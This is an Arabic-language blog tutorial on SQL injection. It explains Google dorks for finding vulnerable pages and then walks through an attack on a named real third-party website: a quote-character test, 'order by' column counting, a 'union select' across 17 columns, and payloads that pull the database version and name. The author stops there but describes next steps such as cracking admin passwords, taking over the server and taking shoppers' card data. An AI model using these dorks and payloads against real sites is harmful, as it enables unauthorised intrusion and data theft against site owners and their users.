بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
النهاردة ان شاء الله موضوعنا مختلف شوية عن المواضيع الى قبل كدة
فى الفترة الاخيرة كلنا او معظمنا سمعنا عن عمليات اختراق لمواقع كبيرة وهجمات الكترونية مدمرة
لكن 99 بالمية مننا مش عارف بتتم ازاى او ايه هى بدايتها
طبعا الاختراق طريقين عشوائى ومستهدف .. العشوائى بيبقى عن طريق دوركات ( وهوضحه فى الدرس )
اما المستهدف بيكون ليه اليات فحص معينة وبيتم بدقة عالية وتركيز عالى حسب كل موقع .
والى هشرحه النهاردة كيف يتم اختراق قواعد البيانات والتسلل اليها وسحب البيانات منها عن طريق ثغرة سهلة تسمى sql injection
سيكول = قاعدة البيانات
injection = حقن
sql injection = حقن قواعد البيانات باوامر لاستخراج ملفات حساسة واختراقها
اولا قاعدة البيانات عبارة عن جداول واعمدة . .
الجدول كلنا عارفين انه فيه اعمدة .. والداتا بيز هى بالفعل جدول يعنى فيها اعمدة
والاعمدة هى الى بتضم بيانات القاعدة مثلا عمود الايميل فيه ايميلات المستخدمين وعمود الـ id فيه رقم المستخدم وعمود phone به رقم هاتف المستخدم
مثلا : انت سجلت فى منتدى بيطلعلك استمارة بتملاها بالبيانات زى اسم المستخدم وكلمة السر والايميل .. الخ
بمجرد انك تدخل البيانات دى بيتم نقلها الى قاعدة البيانات الايميل فى عمود emaill و الباسوور فى عمود password والاسم فى عمود user name وهكذا .. ودا عشان لما تيجى تسجل دخولك للموقع .. فورم تسجيل الدخول يعمل اتصال بقاعدة البيانات ويسالها هل فعلا اسم المستخدم موجود ؟ وهل فعلا الباسورد مرتبط بيه ؟؟!
لو فعلا اسم المستخدم موجود فى القاعدة والباسورد مطابق لاسم المستخدم هيتم دخولك بنجاح .. اما غير ذلك انسى يا عمرو :D
صورة لقاعدة بيانات بسيطة لموقع .. للتوضيح
.gif)
صورة لقاعدة بيانات اكبر من السابقة ..
.gif)
زى ما احنا شايفين فى القاعدة الاولى بيانات المستخدمين من اى دى واسم مستخدم وايميل وباسوورد والرتبة وتاريخ التسجيل .. الخ
الباسوورد يتم جدولته مشفر بمعنى مثلا لو باسوورد 123456 يتم جدولته بهذه الطريقة
e10adc3949ba59abbe56e057f20f883e
مشفر بطريقة md5 .. وهناك مواقع وبرامج لفك التشفيريستخدمها الهاكرز فى فك كلمات المرور والرموز الغريبة والحصول على كلمة المرور للدخول الى اى عضوية فى قاعدة بيانات الموقع بما فيها عضوية المدير ومنها يتم التحكم بالموقع ومن ثم السيطرة على السيرفر بالكامل .. والسيرفر يحوى اكثر من موقع .. يعنى لو اخترقت موقع عليه باقى المواقع الله يرحمهم :D
وفيه طرق تشفير معقدة اكتر من كدة بكتير .. طبعا التشفير للحماية من الهاكرز ~
ندخل فى الموضوع :D
كيف يتم الاختراق .. الاختراق طريقين مستهدف وعشوائى ..
سنتطرق الى العشوائى .. وهو يتم عن طريق دوركات
ما هى الدوركات ؟
- الدوركات عبارة عن اكواد يتم تصنيعها ووضعها فى جوجل للبحث عن مواقع مصابة بثغرة ما
مثلا ثغرة سيكول انجكشن الى موضوعنا عليها اليوم .. هدفها التسلل لقواعد البيانات مباشرة
وشكل الموقع المصاب بيها بيكون كالتالى
www.example.com/php?id=5
يعنى اهم شئ الرابط يكون فيه = وبعدها اى رقم
ممكن يكون كدة
www.example.com/view?id=7
او www.example.com/product?id=89
وهكذا والدوركات كتيرة جدا ..
كيف يتم استغلال الدورك ؟؟
مثلا هستخدم الدورك دا
inurl:php?id=5
inurl = ابحث عن الروابط التى بها القيمة التى بعد النقطتن والى هى php?id=5
php?id=5 = الكلمة الى هبحث عليها فى الروابط
نحطه فى جوجل نكتب inurl:php?id=5
هيطلعلنا مواقع كتيييييييير ونلاحظ ان فى الروابط php?id=5
ونتائج كتييير جدا .. مثلا هختار الموقع دا للتطبيق عليه
http://www.snowdonia-society.org.uk/index2.php?id=5
موقع عادى جدا .. الان هختبره اذا مصاب بسيكول انجيكشن او لا
هحط علامة ' بعد الرقم
* حولت الكيبورد للانجليزية ثم ضغطت على shift + حرف ط
سابدا الان التحدث مع قاعدة البيانات للحصول على ما اريد :D
اذا حدث اى تغيير فى الصفحة مثلا اختفاء الكلام او اختفاء صورة .. او ظهور رسالة خطا هذا معناه ان الموقع مصاب
واذا لم يظهر معناه ان الموقع غير مصاب بسيكول انجيكشن يعنى مرقع
اقوم بوضع العلامة بعد الرابط لمشاهدة ما الذى سيحدث
يصبح الرابط كالتالى :
ونلاحظ ظهور رسالة الخطا .. اذا الموقع مصاب :D نكمل
دلوقتى عايز اعرف عدد الاعمدة الى فى القاعدة عشان اقدر اكلمها
نستخدم امر order+by+50
هيبقى الرابط على الشكل دا
http://www.snowdonia-society.org.uk/index2.php?id=-5+order+by+50--
نلاحظ وضعنا - بعد يساوى فى الرابط .. ووضعنا -- بعد الرقم الى هو 50
طلعتلنا رسالة خطا Error 1054 : Unknown column '50' in 'order clause'
يعنى معناها عدد العواميد اقل من 50 نجرب 20 مثلا
http://www.snowdonia-society.org.uk/index2.php?id=-5+order+by+20--
برضوا رسالة خطا ..
كل ما تطلع رسالة خطا ننقص فى الرقم لحد الرقم الى يختفى عنده الخطا يبقى هو دا عدد الاعمدة ..
تمام قعدت اجرب لحد ما الخطا اختفى عند رقم 17
http://www.snowdonia-society.org.uk/index2.php?id=-5+order+by+17--
تمام اختفت رسالة الخطا الى كانت بتظهر وظهر محتوى الموقع عادى ..
نكمل نطلع رقم العمود المصاب
بامر union+select
ودا بنحط فيه ترقيم عدد الاعمدة الى طلعناه الى هو اختفى عنده الخطا الى هو 17
ازاى.. كالتالى.. الرابط بيوضح كل حاجة
http://www.snowdonia-society.org.uk/index2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
حطيت +union+select+1,2,....17--
كل حاجة واضحة فى الرابط
طيب نشوف ظهرلنا ايه فى الصفحة . .
وهما دول الاعمدة المصابة فى قاعدة البيانات دى ..
يعنى اى امر هنطبقه هنحطه مكان اى عمود فى الاتنين دول فى الرابط
مثلا لو عايز اطلع اصدار قاعدة البيانات هحط مكان 10 او 11 فى الرابط امر version()
مثلا حطها مكان العمود العاشر
كالتالى
http://www.snowdonia-society.org.uk/index2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17--
تمام طلعلى اصدار القاعدة وهو الاصدار الخامس
الاصدار الخامس ما بيحتاج عمليات تخمين .. محاكاه مباشرة لقاعدة البيانات ..
اما لو الاصدار الرابع .. بيحتاج تخمين ودوشة ..
طيب دلوقتى لو عايز اطلع اسم قاعدة البيانات
بحط الامر database() مكان العمود المصاب الى هو 10 او 11
كالتالى
www.snowdonia-society.org.uk/index2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,17--
تمام طلعلى اسم قاعدة البيانات
بعدها تاتى اوامر استخراج اسماء الاعمدة ومن ثم استدعاء البيانات منها اليوزر نيم والباسوورد وفك تشفير الباسورد وايجاد مسار الدخول .. والدخول للوحة التحكم .. واختراق الموقع .. وكافة المواقع على السيرفر :D
وان كان موقع شوبينج يتم استدعاء بيانات الفيزا كارد للاعضاء وسحبها :D
طبعا مش هكمل عشان محدش يستخدمها فى حاجة تغضب ربنا ..
بس حبيت اوضح الفكرة مش اكتر ..
اسف على الاطالة ..
دمتم فى امان الله ~
حسابى على الفيس بوك
ولا تنسى تسجيل اعجابك للصفحة على الفيس بوك ..
Whats App + Mobile : 00201017238326
Mobile : 00201113234340
0 التعليقات:
إرسال تعليق
( مَا يَلْفِظُ مِنْ قَوْلٍ إِلَّا لَدَيْهِ رَقِيبٌ عَتِيدٌ)